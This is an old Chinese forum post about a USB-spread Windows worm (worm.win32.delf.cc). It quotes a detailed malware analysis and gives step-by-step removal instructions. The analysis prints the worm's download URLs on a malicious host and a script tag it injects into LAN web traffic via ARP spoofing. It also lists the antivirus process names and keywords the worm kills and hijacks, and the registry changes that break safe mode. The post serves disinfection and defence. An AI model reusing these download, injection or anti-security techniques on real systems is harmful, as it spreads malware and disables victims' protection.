2007-06-12, 02:38 PM | #1 | |
注册日期: 2007-05-17
住址: 地球
帖子: 1,140
积分:1
精华:1
现金:3135金币
资产:3135金币
|
自动关闭了吧。郁闷吧。解决方法就在下面
自动关闭了吧。郁闷吧。解决方法就在下面 首先声明下,如果你已经中我所说的这个病毒了,那么,抱歉,你的浏览器马上就自动关闭了,你换一台电脑, 或者马上ctrl+a ctrl+c 复制所有的到记事本中,否则,马上这个页面就关闭了。 症状: 1、电脑速度变得很慢。 2、电脑进不了安全模式,按F8选择安全模式后,总自动重新启动。 3、所有杀毒软件打不打开。卡巴斯基、瑞星卡卡、360安全卫士、AVG Anti-Spyware 7.5等均打不开,所有 清理流氓软件的软件都打不开,如:瑞星卡卡,魔法兔子,优化大师,等等,都打不开。 4、自动关闭带有病毒、杀毒,注册表,瑞星卡卡,卡巴斯基等跟各种杀毒软件,上网助手的字眼有关的网 页、文件夹。想重新下载病毒软件,不给机会,如想下载瑞星卡卡,只要有瑞星两字,3秒后就自动关闭该网页 ,想在baidu查一下是什么原因,带只要打“杀毒”“查毒”“注册表”等字眼就自动关闭。想打开在E盘的卡巴 斯基,还没见到卡巴斯基的程序,文件夹就自动关闭了,。 5、注册表修复站里的注册表“修复”二字变灰色,无法点击。 6:文件夹选项不能更改,(不让显示受保护的操作系统文件) 。(禁止使用双击打开除系统盘以外的其他盘,如果非要打开不可,必须右键点选打开。) 我是这样处理的。我先把卡巴斯基的安装文件复制到D盘根目录,(D:\kav6.msi)然后我GHOST还原了一下我曾经备份干净的系统(这个系统没安装杀毒软件),恢复好后,直接按键盘上的 WIN+R 运行程序,然后输入D:\kav6.msi(卡巴斯基杀毒软件的安装程序),安装后重新启动,,重新启动后查毒,找到了D盘上面的病毒worm.win32.delf.cc 是一个0BEC2629.exe的文件,杀掉,然后把autorun.ini删除(可能隐藏,文件夹选项里面打开就看到),OVER。 查完之后知道是这个病毒搞的了, 以上症状是由于 worm.win32.delf.cc 病毒引起的。这个病毒在各个分区的根目录生成AUTORUN.ini和 ******.EXE的文件,每次只要你双击D、E、F等盘,就自动运行病毒。(禁止使用双击打开除系统盘以外的其他盘,如果非要打开不可,必须右键点选打开。) -----------------------------------------------------转载一个别人的分析报告,刚发现的,比我的详细多了随机8位数字和字母组合的恶性U盘Bing Du的分析2007-05-26 11:47 以下情况是本人测试所得,如需转帖,请注明作者(清新阳光) 和出处http://hi.baidu.com/newcenturysun/bl...292457e2c.html 谢谢! 由于病毒屏蔽 带有“病毒”字样的窗口 所以改一下帖子的名字 最近发现很多人出现了打不开杀毒软件 反病毒工具 甚至带有病毒字样的窗口 今天就接到了这样的一个样本 先前 我发的那个一个坏事做绝的U盘病毒应该就是这个 但今天收到的是新变种 这是一个可以说结合了几乎所有病毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及! 病毒特征: 1.破坏安全模式 2.结束常见杀毒软件以及反病毒工具进程 3.监控窗口 4.关闭自动更新以及Windows安全中心 5.屏蔽显示隐藏文件 6.下载木马 7.IFEO映像劫持 分析报告 File: 1201AEC1.exe Size: 36435 bytes MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB SHA1: E760703C8776C652B424FA62AF945434FB786BE5 CRC32: 27CA1195 加壳方式:UPX 病毒运行后 在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文 件名的dll 和一个同名的dat 文件 我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll 这个随机的数字应该与机器码有关 该dll插入Explorer进程 Timplatform以及ctfmon进程 监视并关闭以下进程以及窗口 AntiVirus TrojanFirewall Kaspersky JiangMin KV200 kxp Rising RAV RFW KAV200 KAV6 McAfe Network Associates TrustPort NortonSymantec SYMANT~1 Norton SystemWorks ESET Grisoft F-Pro Alwil Software ALWILS~1 F-Secure ArcaBit Softwin ClamWin DrWe Fortineanda Software Vba3 Trend Micro QUICKH~1 TRENDM~1 Quick Heal eSafewido Prevx1 ers avg Ikarus SophoSunbeltPC-cilli ZoneAlar Agnitum WinAntiVirus AhnLab Normasurfsecret Bullguard\Blac 360safe SkyNet Micropoint Iparmor ftc mmjk2007 Antiy Labs LinDirMicro Lab Filseclab ast System Safety Monitor ProcessGuard FengYun Lavasoft NOD3 mmsk The Cleaner Defendio kis6Beheadsreng IceSword HijackThis killbox procexp Magicset EQSysSecureProSecurity Yahoo! baidu P4P Sogou PXP ardsys 超级兔子木马 KSysFiltsys KSysCallsys AVK K7 Zondex blcorp Tiny Firewall Pro Jetico HAURI CA kmx PCClear_Plus Novatix Ashampoo WinPatrol Spy Cleaner Gold CounterSpy EagleEyeOS Webroot BufferZ avp AgentSvr CCenter Rav RavMonD RavStub RavTask rfwcfg rfwsrv RsAgent Rsaupd runiep SmartUp FileDsty RegClean 360tray 360Safe 360rpt kabaload safelive Ras KASMain KASTask KAV32 KAVDX KAVStart KISLnchr KMailMon KMFilter KPFW32 KPFW32X KPFWSvc KWatch9x KWatch KWatchX TrojanDetector UpLive.EXE KVSrvXP KvDetect KRegEx kvol kvolself kvupload kvwsc UIHost IceSword iparmo mmsk adam MagicSet PFWLiveUpdate SREng WoptiClean scan32 hcfg32 mcconsol HijackThis mmqczj Trojanwall FTCleanerShell loaddll rfwProxy KsLoader KvfwMcl autoruns AppSvc32 ccSvcHst isPwdSvc symlcsvcnod32kui avgrssvc RfwMain KAVPFW Iparmor nod32krn PFW RavMon KAVSetup NAVSetup SysSafe QHSET zxsweep. AvMonitor UmxCfg UmxFwHlp UmxPol UmxAgent UmxAttachment KPFW32 KPFW32X KvXP_1 KVMonXP_1 KvReport KVScan KVStub KvXP KVMonXP KVCenter TrojDie avp.com. krepair.COM KaScrScn.SCR Trojan Virus kaspersky jiangmin rising ikaka duba kingsoft 360safe 木马 木馬 病毒 杀毒 殺毒 查毒 防毒 反病毒 专杀 專殺 卡巴斯基 江民 瑞星 卡卡社区 金山毒霸 毒霸 金山社区 360安全 恶意软件 流氓软件 举报 报警 杀软 殺軟 防駭 在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件 在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件 删除C:\WINDOWS\system32\verclsid.exe 将其重命名为verclsid.exe.bak 注册表相关操作 删除 HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} 破坏安全模式 修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值 为0x00000000 HKU\S-1-5-21-1085031214-1078145449-839522115-500 \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002 HKU\S-1-5-21-1085031214-1078145449-839522115-500 \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001 屏蔽显示隐藏文件 修改常见杀毒软件服务的start键值为0x00000004 如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004 修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start 和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004 关闭自动更新 添加IFEO映像劫持项 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe 被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件 下载dl1.exe到临时文件夹 启动IE连接219.152.120.37:80 首先下载http://google.xxxx38.org/update/down.txt看病毒主文件(也就是那个8位随机数字或者字母的文件)是否需要更新 如果需要更新则下载http://google.xxxx38.org/update/update.exe更新自身 然后分别下载http://google.xxxx38.org/update/wow.exe http://google.xxxx38.org/update/mh.exe http://google.xxxx38.org/update/wm.exe http://google.xxxx38.org/update/my.exe http://google.xxxx38.org/update/wl.exe http://google.xxxx38.org/update/zt.exe http://google.xxxx38.org/update/jh.exe http://google.xxxx38.org/update/tl.exe http://google.xxxx38.org/update/1.exe http://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe 具体每个文件的生成物就不一一列举了 不过值得一提的是ycnt9.exe这个木马 他生成C:\WINDOWS\system32\win1ogo.exe 并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗 插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码 也就是局域网内所有用户在打开网页时都会被插入这段代码 所有木马文件植入完毕后 生成物如下 C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe sreng日志反映如下(在处理一些东西后扫描的这里提前列出) [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] <{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\41115BDD.dll> [] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] <Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A] [PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803- 2158)] [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ] [C:\WINDOWS\system32\Kvsc3.dll] [N/A, ] 解决办法如下: 1.确定那个8位随机数的dll的名称 这里我们选用winrar确定那个dll的名称 方法是:打开winrar.exe 工具 查看文件 在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录 (如图1) 我这台被感染的电脑的文件名为41115bdd.dll 2.使用强制删除工具删除那个dll文件 这里我们选用Xdelbox1.2这个软件 具体使用方法见http://hi.baidu.com/teyqiu/blog/item...ece1b3e5a.html(里面有下载地址) 重起机器后 3.恢复被映像劫持的软件 这里我们使用autoruns这个软件 http://www.skycn.com/soft/17567.html 由于这个软件也被映像劫持了 所以我们随便把他改个名字 打开这个软件后 找到Image hijack (映像劫持) 删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000 Microsoft Corporation c:\windows\system32\ntsd.exe 以外的所有项目 4.此时我们就可以打开sreng了 呵呵 打开sreng 系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是 5.恢复显示隐藏文件 把下面的 代码拷入记事本中然后另存为1.reg文件 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000002 "HKeyRoot"=dword:80000001 "HelpID"="shell.hlp#51105" 双击1.reg把这个注册表项导入 好了 此时病毒对于我们的所有限制已经解除了 下面就是清除其下载的木马了 重起机器 进入安全模式 打开sreng 启动项目 注册表 删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的 <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> [] 双击Userinit 把其键值改为C:\WINDOWS\system32\userinit.exe, 在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”, 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”: [CelInDrv / CelInDrv][Stopped/Disabled] <\??\C:\WINDOWS\system32\Drivers\CelInDriver.sys><N/A> 双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件 (推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定 然后删除 C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合) C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合) C:\WINDOWS\system32\DirectX\DirectX.ini C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\system32\LYLOADER.EXE C:\WINDOWS\system32\LYMANGR.DLL C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合) C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话) 还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合) 一定不要双击 最好的方法是用winrar看 注意 其他分区下的autorun.inf和8位随机数的exe一定要删 而且必须用winrar删 不能双击打开 也不能右键打开 5.26 update:刚刚发现病毒主程序更新了 新版本的主程序的相关信息 File: update.exe Size: 36435 bytes MD5: 981A3D735B65F85ADF72EB00CBE7E342 SHA1: F96C27CA5D8380D07C571CB4A5EA95838E1C8B92 CRC32: EB10E247 并且下载的木马也有变化 http://google.xxxx38.org/update/1.exe 有变化 新病毒的版本为2007-5-26-21:50的版本 清除方法已经更新 2.bmp 1.bmp |
|
|
||
|